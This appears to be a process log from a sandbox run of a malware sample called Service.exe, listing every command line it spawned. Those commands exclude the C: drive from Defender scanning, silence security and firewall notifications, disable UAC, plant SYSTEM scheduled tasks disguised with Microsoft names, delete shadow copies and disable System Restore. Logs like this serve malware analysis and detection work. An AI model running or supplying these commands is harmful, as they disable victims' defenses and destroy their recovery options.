Service.exe(进程ID:2896) 命令行:"c:\users\admin\appdata\local\temp\service.exe"
cmd.exe(进程ID:5844) 命令行:cmd /c babel.bat
powershell.exe(进程ID:1844) 命令行:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "$defenderExclusions = Get-MpPreference; $defenderExclusions.ExclusionPath = $defenderExclusions.ExclusionPath + 'C:\'; Set-MpPreference -ExclusionPath $defenderExclusions.ExclusionPath"
reg.exe(进程ID:1816) 命令行:reg.exe ADD HKCU\Software\Policies\Microsoft\Windows Defender Security Center\Notifications /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe(进程ID:4912) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.WindowsDefender.SecurityCenter.Notifications /v Enabled /t REG_DWORD /d 0 /f
reg.exe(进程ID:5216) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\WindowsDefenderSecurityCenter /v Enabled /t REG_DWORD /d 0 /f
reg.exe(进程ID:5764) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance /v Enabled /t REG_DWORD /d 0 /f
reg.exe(进程ID:3164) 命令行:reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
reg.exe(进程ID:4492) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v DisableNotifications /t REG_DWORD /d 1 /f
reg.exe(进程ID:4496) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile /v DisableNotifications /t REG_DWORD /d 1 /f
reg.exe(进程ID:1948) 命令行:reg.exe ADD HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile /v DisableNotifications /t REG_DWORD /d 1 /f
reg.exe(进程ID:3480) 命令行:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Notifications /v SCNotifyEnabled /t REG_DWORD /d 0 /f
reg.exe(进程ID:5320) 命令行:reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
schtasks.exe(进程ID:4412) 命令行:schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceSecurityAlert" /tr "powershell -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1"" /sc once /st 00:00 /du 9999:59 /ri 58 /ru "SYSTEM" /RL HIGHEST /F
schtasks.exe(进程ID:4108) 命令行:schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F
vssadmin.exe(进程ID:3932) 命令行:vssadmin delete shadows /for=c: /all /quiet
net.exe(进程ID:6232) 命令行:net stop VSS /y
net1.exe(进程ID:6248) 命令行:C:\Windows\system32\net1 stop VSS /y
reg.exe(进程ID:6324) 命令行:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /f /v DisableSR /t REG_DWORD /d 1
reg.exe(进程ID:6352) 命令行:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /f /v DisableConfig /t REG_DWORD /d 1
cmd.exe(进程ID:6384) 命令行:"c:\windows\System32\cmd.exe" /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\"
rundll32.exe(进程ID:6592) 命令行:rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\"
cmd.exe(进程ID:6392) 命令行:"c:\windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1
powershell.exe(进程ID:6584) 命令行:powershell -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Local\Programs\Common\NUL\mbam.ps1
cmd.exe(进程ID:6400) 命令行:"c:\windows\System32\cmd.exe" /c C:\ProgramData\MicrosoftTool\current\Microsoft.exe